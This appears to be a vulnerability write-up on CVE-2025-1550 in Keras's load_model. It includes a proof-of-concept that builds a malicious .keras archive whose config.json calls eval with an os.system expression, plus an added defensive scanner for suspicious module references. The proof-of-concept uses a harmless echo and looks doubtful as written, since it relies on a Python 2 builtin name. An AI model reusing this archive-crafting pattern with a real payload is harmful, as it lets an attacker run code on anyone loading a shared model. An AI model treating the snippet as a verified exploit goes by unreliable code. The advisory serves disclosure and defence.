Keras is a popular high-level neural networks API written in Python, which is capable of running on top of TensorFlow, Microsoft Cognitive Toolkit, or Theano. Keras allows users to develop deep learning models in a fast and user-friendly manner, resulting in an extensive user base.

However, a security vulnerability has been discovered in Keras, specifically in the Model.load_model function. This vulnerability, assigned the identifier CVE-2025-1550, permits arbitrary code execution in certain situations, even when the safe_mode=True flag is set. This post will provide a detailed analysis of the vulnerability, along with code snippets to showcase the exploit, and links to original references for further information.

Vulnerability Details

The vulnerability occurs when loading a model from a specially crafted .keras archive. By manipulating the config.json file contained within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, which will be loaded and executed during model loading.

To truly understand how this can be exploited, let's take a look at a code snippet showcasing the vulnerability:

import json
from zipfile import ZipFile

# Create malicious .keras archive
archive_path = 'malicious_archive.keras'
config = {
    "class_name": "keras.wrappers.scikit_learn.KerasClassifier",
    "config": {
        "build_fn": {
            "class_name": "__builtin__.eval",
            "config": {
                "expr": "__import__('os').system('echo Arbitrary code executed')",
                "globals": None
            }
        }
    }
}

with ZipFile(archive_path, 'w') as zf:
    zf.writestr('config.json', json.dumps(config))

# Loading the malicious model archive in Keras
from keras.models import load_model
loaded_model = load_model(archive_path, safe_mode=True)  # Safe mode does not help

In this code snippet, we first create a malicious .keras archive by writing a modified config.json file to the archive, specifying the __builtin__.eval function and providing an arbitrary code execution expression. The archive is then saved as 'malicious_archive.keras'.

Next, the load_model function from Keras is used to load this model archive. Despite the safe_mode=True flag being set, which should ideally prevent code execution, the malicious code contained within the archive is still executed.

Original References

- Keras Repository
- Keras Documentation

Conclusion and Mitigation

The arbitrary code execution vulnerability (CVE-2025-1550) in the Keras Model.load_model function can be exploited by an attacker who understands the archive structure and has the ability to craft malicious .keras archives. Because the safe_mode=True flag does not prevent the code from running, users are advised to load models only from trusted sources and to inspect the contents of model archives, in particular config.json, before loading them.
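The following is an added example of the pre-load inspection just described; it is not code from the original post or from the Keras project. It opens a .keras archive with the standard library only, never deserializes a model object, and walks config.json for "module", "class_name" and "registered_name" values that resolve outside the Keras namespace. The allowlist, the heuristic of treating dotted class names as module references, and the two sample configs (including the made-up package name untrusted_pkg) are all assumptions constructed for this illustration.

```python
import io
import json
import zipfile

# Assumed allowlist (an example heuristic, not a Keras feature): a legitimate
# config.json should only reference objects rooted in the Keras namespace.
ALLOWED_MODULE_ROOTS = ("keras",)

# Keys in a .keras config whose string values name importable Python objects.
REFERENCE_KEYS = ("class_name", "module", "registered_name")


def _root_package(name):
    """Return the top-level package of a dotted Python path such as 'a.b.c'."""
    return name.split(".", 1)[0]


def find_suspicious_references(config):
    """Walk a deserialized config.json and return (json_path, value) pairs for
    every object reference that resolves outside ALLOWED_MODULE_ROOTS."""
    findings = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                child = f"{path}.{key}" if path else key
                if key in REFERENCE_KEYS and isinstance(value, str):
                    # A bare class name ("Dense") cannot reach another module on
                    # its own; a dotted path or a "module" entry can.
                    if key == "module" or "." in value:
                        if _root_package(value) not in ALLOWED_MODULE_ROOTS:
                            findings.append((child, value))
                walk(value, child)
        elif isinstance(node, list):
            for i, item in enumerate(node):
                walk(item, f"{path}[{i}]")

    walk(config, "")
    return findings


def inspect_keras_archive(archive):
    """Open a .keras zip (path or file-like object) without deserializing any
    model object, and report references to non-Keras modules in config.json."""
    with zipfile.ZipFile(archive) as zf:
        if "config.json" not in zf.namelist():
            raise ValueError("archive has no config.json; refusing to assess it")
        config = json.loads(zf.read("config.json"))
    return find_suspicious_references(config)


def _build_archive(config):
    """Constructed helper: write a config dict into an in-memory .keras zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("config.json", json.dumps(config))
    buf.seek(0)
    return buf


# Constructed sample 1: a config shaped like an ordinary Keras 3 Sequential model.
BENIGN_CONFIG = {
    "module": "keras",
    "class_name": "Sequential",
    "config": {
        "name": "sequential",
        "layers": [
            {"module": "keras.layers", "class_name": "Dense",
             "config": {"units": 4, "activation": "relu"}}
        ],
    },
}

# Constructed sample 2: same outer shape, but one nested reference points at a
# made-up package outside the Keras namespace (placeholder name, not a real module).
SUSPICIOUS_CONFIG = {
    "module": "keras",
    "class_name": "Sequential",
    "config": {
        "name": "sequential",
        "layers": [
            {"module": "untrusted_pkg.helpers", "class_name": "Loader",
             "config": {"target": "example_placeholder"}}
        ],
    },
}


def scan_samples():
    """Run the check over both constructed archives and return the findings."""
    return {
        "benign": inspect_keras_archive(_build_archive(BENIGN_CONFIG)),
        "suspicious": inspect_keras_archive(_build_archive(SUSPICIOUS_CONFIG)),
    }


if __name__ == "__main__":
    for label, findings in scan_samples().items():
        status = "OK" if not findings else "REFUSE TO LOAD"
        print(f"{label}: {status} {findings}")
```

Run the check on an archive before ever handing its path to load_model, and treat any finding as a reason to refuse the file rather than as a prompt to loosen the allowlist; the walk is deliberately shallow on semantics (it never imports anything) so that inspection itself cannot trigger the behaviour it is looking for.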

Furthermore, the Keras development team should be notified of this vulnerability (if they have not already been made aware) and provide a patch as soon as possible to address the issue.

Timeline

Published on: 03/11/2025 09:15:25 UTC